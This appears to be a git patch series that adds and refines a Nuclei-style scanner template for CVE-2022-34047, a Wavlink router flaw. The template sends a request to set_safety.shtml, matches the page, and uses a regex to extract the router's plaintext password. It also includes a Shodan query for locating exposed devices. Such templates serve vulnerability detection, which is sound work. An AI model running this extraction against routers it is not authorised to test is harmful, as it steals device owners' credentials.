From 46cf248bd05ab47f0a9ccb9c7e6d996eca160ef0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com> Date: Thu, 21 Jul 2022 03:39:27 +0800 Subject: [PATCH 1/3] Create CVE-2022-34047.yaml --- cves/2022/CVE-2022-34047.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-34047.yaml diff --git a/cves/2022/CVE-2022-34047.yaml b/cves/2022/CVE-2022-34047.yaml new file mode 100644 index 0000000000..5c9cb63583 --- /dev/null +++ b/cves/2022/CVE-2022-34047.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-34047 + +info: + name: Wavlink Password Leak + author: For3stCo1d + severity: high + description: | + An access control issue in Wavlink WN530HG4 M30HG4.V5030.191116 allows attackers to obtain usernames and passwords via view-source:http://IP_ADDRESS/set_safety.shtml?r=52300 and searching for [var syspasswd]. + reference: + - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 + metadata: + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,wavlink,router,leak + +requests: + - method: GET + path: + - '{{BaseURL}}/set_safety.shtml?r=52300' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var syspasswd" + - 'APP</title' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - 'syspasswd="(.+?)"' From a222f0af88563a18c24918ec6c0aa9535410d16f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com> Date: Thu, 21 Jul 2022 03:54:47 +0800 Subject: [PATCH 2/3] Update CVE-2022-34047.yaml --- cves/2022/CVE-2022-34047.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-34047.yaml b/cves/2022/CVE-2022-34047.yaml index 5c9cb63583..7096a91c98 100644 --- a/cves/2022/CVE-2022-34047.yaml +++ b/cves/2022/CVE-2022-34047.yaml @@ -1,7 +1,7 @@ id: CVE-2022-34047 info: - name: Wavlink Password Leak + name: Wavlink Set_safety.shtml Password Leak author: For3stCo1d severity: high description: | @@ -14,9 +14,10 @@ info: tags: cve,cve2022,wavlink,router,leak requests: - - method: GET - path: - - '{{BaseURL}}/set_safety.shtml?r=52300' + - raw: + - | + GET /set_safety.shtml?r=52300 HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: @@ -24,7 +25,7 @@ requests: part: body words: - "var syspasswd" - - '<title>APP</title' + - '<title>APP' condition: and - type: status From b2cdaa30b119794b914dc4abf4ad1386723231b2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 21 Jul 2022 13:33:57 +0530 Subject: [PATCH 3/3] Update CVE-2022-34047.yaml --- cves/2022/CVE-2022-34047.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-34047.yaml b/cves/2022/CVE-2022-34047.yaml index 7096a91c98..6f57a4eb82 100644 --- a/cves/2022/CVE-2022-34047.yaml +++ b/cves/2022/CVE-2022-34047.yaml @@ -1,7 +1,7 @@ id: CVE-2022-34047 info: - name: Wavlink Set_safety.shtml Password Leak + name: Wavlink Set_safety.shtml - Password Exposure author: For3stCo1d severity: high description: | @@ -10,8 +10,9 @@ info: - https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharing - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047 metadata: + verified: true shodan-query: http.title:"Wi-Fi APP Login" - tags: cve,cve2022,wavlink,router,leak + tags: cve,cve2022,wavlink,router,exposure requests: - raw: @@ -24,7 +25,7 @@ requests: - type: word part: body words: - - "var syspasswd" + - 'var syspasswd="' - 'APP' condition: and